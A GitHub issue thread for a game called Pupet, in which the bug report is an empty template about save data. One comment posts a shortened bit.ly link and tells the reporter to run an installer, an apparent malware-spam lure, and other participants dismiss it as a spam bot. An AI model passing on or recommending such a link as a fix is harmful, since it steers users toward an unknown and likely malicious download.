### ISSUE TITLE
[BUG] Petters not transferring between saves

### ISSUE THREAD

**Issue by iampauleps** [DragginGroup/Pupet#6]
**Describe the bug**

**To Reproduce**

**Expected behavior**

**Screenshots**

**Device (please complete the following information):**
 - Device: [e.g. Laptop]
 - OS: [e.g. Windows]
 
**Game info**
- Version [e.g. pre-1.04]

**Additional context**

**Comment by iampauleps** [comment]
wtf

**Comment by 777Naity** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by iampauleps** [comment]
the thing sent before i finished

**Comment by iampauleps** [comment]
that's a werid bug with github

**Comment by iampauleps** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

who the actual fuck are you?

**Comment by IdealistCat** [comment]
spam bot probably

**Comment by IdealistCat** [comment]
@iampauleps could I get some more info on the bug? I am a little confused...
